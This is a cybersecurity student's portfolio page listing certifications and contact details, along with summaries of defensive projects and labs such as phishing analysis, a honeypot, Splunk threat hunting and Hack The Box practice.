Bellini College of
Artificial Intelligence,
Cybersecurity & Computing

Hello, I am

Yupeng Liu

USF Cybersecurity · GPA 3.9 / 4.0

▸ B.S. Cybersecurity Student — University of South Florida
▸ TCM Practical SOC Analyst Associate (PSAA)
▸ CompTIA Security+ & Network+
▸ AWS Certified Cloud Practitioner
▸ Competitive CTF Player & Hack The Box

Download Resume Let's Connect

3.9

GPA

5×

Industry Certified

×2

Top 3 CTF Finishes

50+

Phish Analyzed

About

Cybersecurity student at USF passionate about understanding how attackers think and operate. I pursue hands-on labs, CTF competitions, and real-world simulations to sharpen both offensive and defensive skills.

I thrive in fast-paced, problem-solving environments — whether it's tracing a threat through log data, hunting malicious behavior in Splunk, or exploiting a machine on Hack The Box.

LocationTampa, FL

Emailmaybe1107liu@gmail.com

USF EmailLy21@usf.edu

Phone(954) 300-7122

DegreeB.S. Cybersecurity, Dec 2027

LanguagesEnglish, Mandarin

Projects

IAM & Role-Based Access Control System

Oct – Dec 2025

FastAPI · Python · JWT · OAuth2 · SQLite · SQLAlchemy · bcrypt

Designed a secure backend API with JWT authentication and OAuth2 password flow for user identity verification.

Built an RBAC system enforcing least privilege and fine-grained authorization.

Implemented bcrypt password hashing with per-user salts to mitigate credential exposure.

Centralized token validation and request-time permission checks to protect all sensitive API routes.

FastAPIPythonJWTOAuth2SQLitebcrypt

Phishing Analysis & Automation

Sep – Oct 2025

Ubuntu · Python · VirusTotal · emldump.py

Investigated 50+ phishing emails analyzing headers, sender metadata, URLs, and attachments.

Inspected SPF, DKIM, and DMARC authentication results to detect spoofed sender domains.

Performed static and dynamic malware analysis extracting IOCs (hashes, domains, IPs).

Automated triage workflow with Python scripting — reduced manual time by ~30%.

PythonUbuntuVirusTotalSPF/DKIM/DMARC

Azure Honeypot & Sentinel Log Analysis

Apr – May 2025

Microsoft Azure · Sentinel (SIEM) · KQL · Python

Deployed a Windows 10 honeypot VM in Azure with open RDP/SMB ports to attract real brute-force attacks.

Integrated Microsoft Sentinel for log collection and used KQL queries to analyze failed logins by IP and time.

Added IP geolocation enrichment via Python scripts, detecting 500+ login attempts in 48 hours.

AzureSentinelKQLPython

Labs

Network Traffic Analysis

Wireshark · TCPDump · Ubuntu · Linux CLI

Captured and analyzed live network traffic and malicious PCAP files to identify abnormal communication patterns.

Applied grep, cut, sort, and uniq to isolate repeated IPs, unusual ports, and anomalous packets.

Identified intrusion indicators from packet headers, payload contents, and session flows across TCP and UDP.

WiresharkTCPDumpUbuntuPCAP

Incident Response — Malware Triage & Containment

Splunk · Sysmon · Windows Event Logs · MITRE ATT&CK

Investigated a simulated endpoint compromise by triaging Sysmon and Windows Event logs to establish a full attack timeline.

Identified initial access vector, lateral movement, and persistence mechanisms mapped to MITRE ATT&CK techniques (T1059, T1547, T1003).

Correlated process creation, network connection, and file modification events in Splunk to confirm scope of compromise.

Produced a structured incident report with IOCs, affected assets, containment steps, and remediation recommendations.

SplunkSysmonWindows Event LogsMITRE ATT&CK

Threat Hunting — Malicious PowerShell Execution

Splunk · Sysmon · PowerShell Logs · Windows

Demonstrated a full threat hunting methodology for detecting malicious PowerShell execution using Splunk and Sysmon logs.

Progressively narrowed from broad data discovery to specific IOCs — uncovering payload download, persistence, and credential dumping.

Identified attacker TTPs: encoded command execution (T1059.001), registry persistence (T1547.001), and LSASS access (T1003.001).

Built and refined Splunk SPL queries to surface high-fidelity signals buried within high-noise PowerShell telemetry.

SplunkSysmonPowerShellMITRE ATT&CK

Threat Hunting — Malicious CMD Execution

Splunk · Windows Security Logs · Event ID 4688

Hunted for malicious cmd.exe execution using Windows Security Event ID 4688 (Process Creation).

Leveraged SubjectUserName, NewProcessName, and CommandLine fields to track full process lineage and confirm the attack chain.

Correlated Security log artifacts with Sysmon data to cross-validate findings and eliminate false positives.

Demonstrated how Security logs provide a complementary detection layer to Sysmon across the kill chain.

SplunkEvent ID 4688CMDWindows Security Logs

Hack The Box — Machine Exploitation

Kali Linux · Nmap · Metasploit · Burp Suite

Actively attacking HTB machines — enumeration, exploitation, and privilege escalation to root.

Practiced CVE exploitation, web application attacks, and lateral movement techniques.

Building attacker mindset to strengthen defensive security knowledge.

Kali LinuxNmapMetasploitBurp Suite